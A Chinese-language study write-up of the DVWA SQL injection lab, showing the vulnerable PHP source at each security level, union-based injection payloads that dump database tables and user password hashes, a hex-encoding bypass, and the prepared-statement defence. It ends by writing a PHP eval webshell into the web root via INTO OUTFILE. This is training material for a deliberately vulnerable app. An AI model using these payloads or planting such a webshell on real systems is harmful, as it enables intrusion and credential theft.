渗透测试学习2---DVWA之SQL Injection

1.low

PHP源码：

if( isset( $_REQUEST[ 'Submit' ] ) ) {
	// Get input
	$id = $_REQUEST[ 'id' ];

	// Check database
	$query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
	$result = mysql_query( $query ) or die( '
' . mysql_error() . '
' );

	// Get results
	$num = mysql_numrows( $result );
	$i   = 0;
	while( $i < $num ) {
		// Get values
		$first = mysql_result( $result, $i, "first_name" );
		$last  = mysql_result( $result, $i, "last_name" );

		// Feedback for end user
		$html .= "
ID: {$id}
First name: {$first}
Surname: {$last}
";

		// Increase loop count
		$i++;
	}

	mysql_close();
}

?>

从源码看出 , 服务器端直接接收参数$_GET[ ‘id’ ]没做任何处理

1.测试注入点，若存在，判断注入类型

输入

• 1
• 1’
  
  说明可能存在注入，并且知道了使用的是mysql数据库。然后判断注入类型

输入	结果
1’ and ‘1’='2	查询结果为空
1’ or ‘1’='1

说明是字符型注入

2.判断查询字段的个数

输入	结果
1’ order by 2 #	查询成功
1’ order by 3 #

或者使用

• 1’ union select 1,2#
• 1’ union select 1,2,3 #

说明sql查询了2个字段

3.获取数据库版本及当前数据库名

1' union select version(),database() #

数据库版本是5.1.28，当前使用的数据库名是dvwa。
在数据库5以上存在着一个information_schema 数据库，其中保存着关于MySQL服务器所维护的所有其他数据库的信息。可以利用这个数据库进行下面操作。

information_schema的结构:
    information_schema
       |_ schemata               所有数据库的名字
            |_ schema_name       当前数据库名字
       |_ tables                 所有表的名字
            |_ table_schema      表所属数据库的名字
            |_ table_name        表名
       |_ columns                所有字段的名字
            |_ table_schema      字段所属数据库名
            |_ table_name        字段所属表名
            |_ column_name       字段的名字

4.获取当前数据库中的表

1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa' #

dvwa数据库中有两张表，下面以users表为例。

5.获取表中字段名

1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #

6.获取表中信息

这里只查看了user、password两个字段

1' union select user,password from users # 

2.Medium

PHP源码

if( isset( $_POST[ 'Submit' ] ) ) {
	// Get input
	$id = $_POST[ 'id' ];
	$id = mysql_real_escape_string( $id );

	// Check database
	$query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
	$result = mysql_query( $query ) or die( '
' . mysql_error() . '
' );

	// Get results
	$num = mysql_numrows( $result );
	$i   = 0;
	while( $i < $num ) {
		// Display values
		$first = mysql_result( $result, $i, "first_name" );
		$last  = mysql_result( $result, $i, "last_name" );

		// Feedback for end user
		$html .= "
ID: {$id}
First name: {$first}
Surname: {$last}
";

		// Increase loop count
		$i++;
	}

	//mysql_close();
}

?>

比low级别多加了一条语句

$id = mysql_real_escape_string( $id );

mysql_real_escape_string() 函数转义 SQL 语句中使用的字符串中的特殊字符。详细信息----传送门

前端页面使用下拉列表来控制用户输入。

这里我们使用神器BrupSuite，抓包修改参数。

修改后的参数	结果
1’
1 or 1=1

说明注入类型是数字型注入。由于使用mysql_real_escape_string() 函数
，故构造的payload不能有',low级别中使用的单引号有

1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa' #

1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #

可以利用16进制进行绕过。常见绕过技巧
如users的16进制是0×7573657273

1' union select 1,group_concat(column_name) from information_schema.columns where table_name=0×7573657273 #

其它过程与low级别一样

3.High

PHP源码

if( isset( $_SESSION [ 'id' ] ) ) {
	// Get input
	$id = $_SESSION[ 'id' ];

	// Check database
	$query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
	$result = mysql_query( $query ) or die( '
Something went wrong.
' );

	// Get results
	$num = mysql_numrows( $result );
	$i   = 0;
	while( $i < $num ) {
		// Get values
		$first = mysql_result( $result, $i, "first_name" );
		$last  = mysql_result( $result, $i, "last_name" );

		// Feedback for end user
		$html .= "
ID: {$id}
First name: {$first}
Surname: {$last}
";

		// Increase loop count
		$i++;
	}

	mysql_close();
}

?>

High级别的只是在SQL查询语句中使用了LIMIT 1，控制输出结果为一个。但是可以使用#注释掉，过程与low一样。

4.Impossible

PHP源码

if( isset( $_GET[ 'Submit' ] ) ) {
	// Check Anti-CSRF token
	checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

	// Get input
	$id = $_GET[ 'id' ];

	// Was a number entered?
	if(is_numeric( $id )) {
		// Check the database
		$data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
		$data->bindParam( ':id', $id, PDO::PARAM_INT );
		$data->execute();
		$row = $data->fetch();

		// Make sure only 1 result is returned
		if( $data->rowCount() == 1 ) {
			// Get values
			$first = $row[ 'first_name' ];
			$last  = $row[ 'last_name' ];

			// Feedback for end user
			$html .= "
ID: {$id}
First name: {$first}
Surname: {$last}
";
		}
	}
}

// Generate Anti-CSRF token
generateSessionToken();

?>

可以看到，Impossible Secuity Level的代码采用了PDO技术，划清了代码与数据的界限，有效防御SQL注入，同时只有返回的查询结果数量为一时，才会成功输出，这样就有效预防了”脱裤”，Anti-CSRFtoken机制的加入了进一步提高了安全性。

Webshell

利用into outfile()函数写入一句话拿webshell
使用mysql的读写功能需要具有一定的权限。
secure_file_priv参数用来限制load_file,into outfile等相关读写执行函数作用于哪个指定目录。

当 secure_file_priv 的值为 null ，表示限制 mysqld 不允许导入|导出
当 secure_file_priv 的值为/tmp/ ，表示限制 mysqld 的导入|导出只能发生在/tmp/目录下
当 secure_file_priv 的值为/，表示限制 mysqld 的导入|导出的目录为所在的整个磁盘
当 secure_file_priv 的值没有具体值时，表示不对 mysqld 的导入|导出做限制

此操作是在low级别下进行的，假设我们已经通过phpinfo或者其他方式知道了网站的绝对路径。
我的网站根路径是

E:\APMServ\APMServ5.2.6\www\

1' union select '<?php @eval($_POST["hacker"]);?>',2 into outfile 'E:\\APMServ\\APMServ5.2.6\\www\\htdocs\\hacker.php' #

接下来使用菜刀连接。口令是hacker

接下来就可以上传准备的木马文件了。

参考教程

新手指南：DVWA-1.9全级别教程

AnCoLin’s Blog|影风博客DVWA SQL Injection 通关教程